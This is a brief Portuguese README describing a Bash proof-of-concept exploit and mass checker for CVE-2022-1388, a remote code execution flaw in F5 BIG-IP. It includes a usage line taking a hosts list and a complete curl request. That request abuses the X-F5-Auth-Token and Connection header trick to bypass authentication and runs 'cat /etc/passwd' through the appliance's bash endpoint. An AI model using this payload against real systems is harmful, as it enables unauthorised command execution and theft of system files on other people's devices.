
Verificador baseado em Bash e exploit de prova de conceito para CVE-2022-1388 RCE em F5 BIG-IP, possibilitando verificação automatizada de hosts vulneráveis através da execução de payload baseada em curl.
Script bash simples para verificar RCE CVE-2022-1388 (F5 BIG-IP).
[+] Uso: ./CVE-2022-1388.sh hosts.txt
Não se esqueça de alterar o endereço IP
curl -X POST http://10.0.0.1/mgmt/tm/util/bash -d "{'command':'run','utilCmdArgs':-e 'cat /etc/passwd'}" -H "Connection: keep-alive, X-F5-Auth-Token" -H "X-F5-Auth-Token: anything"